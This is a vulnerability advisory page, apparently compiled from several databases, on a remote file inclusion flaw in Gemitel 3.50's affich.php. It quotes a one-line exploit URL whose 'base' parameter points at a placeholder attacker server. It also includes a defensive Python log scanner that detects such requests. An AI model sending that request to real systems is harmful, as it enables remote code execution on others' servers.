Published: 2004-04-15 00:00:00
Last revised: 2016-10-17 23:03:17

[Original] PHP remote file inclusion vulnerability in affich.php in Gemitel 3.50 allows remote attackers to execute arbitrary PHP code via the base parameter.

[CNNVD] Gemitel Affich.PHP Remote File Include Command Injection Vulnerability (CNNVD-200404-050)

        affich.php in Gemitel 3.50 contains a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary PHP code via the base parameter.

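- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources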
(UNKNOWN)  BUGTRAQ  20040415 Include vulnerability in GEMITEL v 3.50
(VENDOR_ADVISORY)  XF  gemitel-spturnphpfile-include(15887)

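- Vulnerability information

Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
High risk Access validation error
2004-04-15 00:00:00 2006-09-28 00:00:00
        affich.php in Gemitel 3.50 contains a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary PHP code via the base parameter.

- Advisories and patches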

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- Vulnerability information (24009)

Gemitel 3.50 Affich.PHP Remote File Include Command Injection Vulnerability (EDBID:24009)
php webapps
2004-04-15 Verified
0 jaguar
N/A

A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.

It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.

[Gemitel folder]/html/affich.php?base=http://[your server]/

- Vulnerability information

Gemitel affich.php base Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

Gemitel contains a flaw that may allow a malicious user to execute arbitrary script code. The 'affich.php' file fails to verify the 'base' parameter before it is used to include a file. This flaw may lead to a loss of Confidentiality, Integrity and/or Availability.
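
Because the flaw is an unvalidated 'base' value reaching an include, requests that exploit it are visible in web server access logs. The following log check is an added example, not code from Gemitel or from the advisories quoted here; it assumes Common/Combined Log Format, and the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a Common/Combined Log Format entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that points at another host: scheme://... or protocol-relative //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def remote_base_value(log_line):
    """Return the remote 'base' value sent to affich.php, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote(target.path).lower().endswith("/affich.php"):
        return None
    # parse_qs percent-decodes once; decode again so a double-encoded
    # value is still flagged for review.
    for value in parse_qs(target.query, keep_blank_values=True).get("base", []):
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            return decoded
    return None


def scan(lines):
    """Return (source_ip, base_value) for every suspicious request."""
    hits = []
    for line in lines:
        value = remote_base_value(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Apr/2004:10:00:01 +0000] "GET /gemitel/html/affich.php?base=../data/ HTTP/1.0" 200 5120',
    '198.51.100.7 - - [15/Apr/2004:10:02:13 +0000] "GET /gemitel/html/affich.php?base=http://remote.example/ HTTP/1.0" 200 311',
    '198.51.100.7 - - [15/Apr/2004:10:02:40 +0000] "GET /gemitel/html/affich.php?x=1&base=HtTp%3A%2F%2Fremote.example%2F HTTP/1.1" 200 311',
    '203.0.113.5 - - [15/Apr/2004:10:05:00 +0000] "GET /index.php?base=http://remote.example/ HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent remote include path {value!r} to affich.php")
```

A hit means the request was made, not that the include succeeded; whether PHP fetched the remote file depends on the server's configuration.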

- Timeline

2004-04-15 2004-04-16
2004-04-16 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author